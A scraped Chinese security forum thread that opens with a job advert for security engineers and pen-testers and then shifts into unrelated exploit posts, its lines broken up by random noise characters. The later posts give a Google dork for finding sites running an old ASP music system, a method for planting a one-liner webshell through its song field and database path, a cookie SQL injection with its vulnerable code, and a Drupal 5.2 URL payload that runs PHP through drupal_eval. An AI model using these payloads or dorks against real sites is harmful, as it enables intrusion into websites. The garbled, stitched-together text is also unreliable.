最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!/ \5 l1 a1 U( ~$ H
    简历投递:352113371@qq.com4 h$ o3 F( w- t
    + B3 j9 o3 F* [
    职位:售前工程师 2名 【7000-15000】
    ! U3 o4 m: }4 g2 R岗位职责:
    - {7 U" [8 b4 ~% S' |1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;/ n3 o" W6 h  U. x+ u
    2、配合销售人员准备与用户的技术交流、PPT等技术文件;$ m1 [' E/ ]; Z* k2 l& W; Y4 t
    3、负责信息安全咨询服务及安全服务的实施工作;
    : d; ~3 A) R5 b& w+ b* x* F4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);
    ; S! I2 ^& n7 U9 D6 y# u5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;* m4 s9 I* H  Z/ h0 _
    任职要求:5 q- A0 V" l1 c$ f; N1 {
    1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;4 }3 P* Y" K3 u! \; O; ^8 D
    2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
    ( J( T+ \4 S4 L8 p9 K3、熟悉企业IT规划的方法论和过程;+ ~3 \$ z$ ^2 |, y
    4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;
    6 x9 d7 v# y( O* \7 r4 \7 Z5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;
    0 |3 U4 [1 X% k: M- d( v6、具有良好的客户沟通能力及技巧;
    : a/ E. N3 k# K: T" K1 o7、能适应经常性短期出差;; T0 O( n- z2 `! y- S
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;
    # V) E1 f8 ?; D5 f' j
    0 q0 L% ?; F9 x* F! D职位:高级信息与网络安全工程师 3名 【5000-25000】% N" B5 j& x9 d, [
    岗位职责:
    $ @5 }8 ]/ x- P: f    常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。
    0 M  B" j8 R7 f; D+ K6 S6 G任职条件:( Y) P7 m' {$ k, r0 W
    1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。
    8 ?6 n4 g2 V0 z) R* R2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;; m4 n0 U* b, g! O9 z) ?
    3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;3 O+ b) n  B. }9 W; m1 {$ r! j
    4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。
    2 @" c6 ]0 a4 }. ]" D" W: R& J
    ; p& a, a3 j& k3 f* b5 _" b( r/ V# Y职位: 安全服务工程师 3名 【5000-15000】
    : }. M. n0 n. g% u+ B* P' s任职要求:' X7 y8 x" n' T
    1. 能力突出者专业学历不限;9 ~( l+ Z2 S- B, ?' J1 H
    2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;
    ( s! e$ g7 K# [4 o  V3. 熟练使用PHP、Python、Perl等任意一门编程语言;% y+ ^8 |0 @) x# K# i+ P0 j
    4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;1 h7 o# F" E/ \0 {% R8 G
    5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;
    * E& T1 o9 G' G8 W5 a5 j" m6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。% t; d2 Z5 O6 a1 X/ R4 F
    优先考虑:2 l' p! f9 {. k
    1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低$ d8 d! k, ~- Q9 c2 V8 \
    2.熟悉iOS & Android APP 等移动安全测试
    : Y; o" G& e7 r# N% V' M" R3.对智能设备、硬件安全测试有了解,熟悉相关常见协议( J6 V" r& }  J
    4.有代码审计相关经验者,具备逆向分析能力更佳;5 [) M" w4 O% m# Y2 z$ p
    5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;0 \4 p& H$ E3 Z
    6.具有其它可以秒杀面试官能力6 o- e, c5 c9 ^4 v; o5 E+ G
    7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    ( a" h" ]& Z$ g  ^8 B4 Q
    数据库未作任何处理,可以插入一句话。继续插入经典一句话

    9 X+ g2 f* s$ m+ e7 \# S

    1 I/ Q& _% v/ H$ w* k: Q
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa
    . s: E  ?. s4 r' [- Y( a3 a
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")
      ~+ a- {* i  P* m7 Z$ _- e2 {
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    - y- e+ v& H0 n- x3 c; T) f
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),
    ' n2 i, j* ~5 {, U
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.
    0 o1 Z7 ]% c' k9 z2 N
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注
    $ C# h. |9 y0 V/ N. O7 C3 Q
    入也就产生了
    7 e) N; X4 }0 t6 l( k& g2 V  |
    用注入中转。

    , F$ C$ V! o  x# ~4 F* E2 X* w0 ]

    1 Q- w# O% F/ Z- a$ q
    8 c/ Z! Q( @% K/ w1 M# t6 H3 C
    ( C' v+ T3 v: t( R' ~
    - K; F# T; x1 ?  I5 U2 J0 r* `7 ?* S3 j0 X2 w: ?, t
    & v, a# y9 P% ~" O* {9 u
    1 A$ F$ w1 C2 Q/ w2 Q8 `

    ; Y, U. J  Z5 a& ^  x/ v0 k4 R3 i# r2 u1 `; ~0 Q

    ( P  b9 V) v! T6 s1 ~4 n, r3 {5 m" J, I. r4 t# y

    * x- i% ~: A$ y
    : y1 `5 d  D# l' Q, j( W. ]( m0 C: j3 t3 X
    . e! a6 V* [4 A9 w3 E# F6 [

    $ b1 K8 I! u0 B' `9 V" W( Y0 B/ @+ r2 t2 T. o2 _9 {$ T4 _: m8 g
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。
    ! v0 E5 ?) C" x# H& H9 v- y: u6 ~  Q) T2 P  o
    , @7 p7 I$ ?! K! J. X) p
    3 [0 G4 }/ f/ \& h9 B* L' ]4 T
    , ~& Q- q9 _' y" F# ^( X' ^3 t% g

    ) d; P0 }' I' e! V9 D; X1 E
    / c9 }0 w3 b9 i; Z
    ' _  S. w" I* S2 b" s. L: ?/ _7 O" n( x
    : N% r+ @& v. w. c

    1 w, p, T% u6 H. x& y- D
    ) }6 l1 s( a* v7 J
    # t- w% T$ i* c, j1 l! L
    7 v# m6 V5 L; I* Y: T6 b: s8 ?5 N$ f( Y
    ) H2 N$ H( `' y+ Y  _- h

    % D( n! w9 ~9 E3 Q' E1 s% r  d1 P& \
    1 O6 C5 f8 J/ m4 }# k8 w, {
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();1 R3 P. u6 c, w4 U" U  L

    2 c3 p  }/ f# h- L! ^8 N6 K
    1 K6 u, e3 U2 S# v6 f* P1 N7 N# B* h+ u7 u9 b* L' e0 M5 H" ~
    ! ^8 Y6 Q  o$ e: {" X" r. M- {

    ) M$ K% R% p- y7 @$ H
    / s* |% h: m$ g7 D% ^8 D; g* t
    8 ~( d  E9 f5 r. u* n$ ^0 _7 [) g! e( z- L( i+ s
    ' l. t6 N+ {( `/ F

    , C3 R) R, g! d
    - N7 k3 B/ T; A! a+ h' t
    5 y- h! _4 z8 ]$ s2 m1 I. E6 C* U; {, {# a' O

    ; T. {- L( H* J: {
    # s! n, {$ V) b; F% O- k3 Z- R5 Y0 j# N3 n  j* A
    , V& _) \/ [& k  l

    / L& \$ R6 Q' r' O/ O: |公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表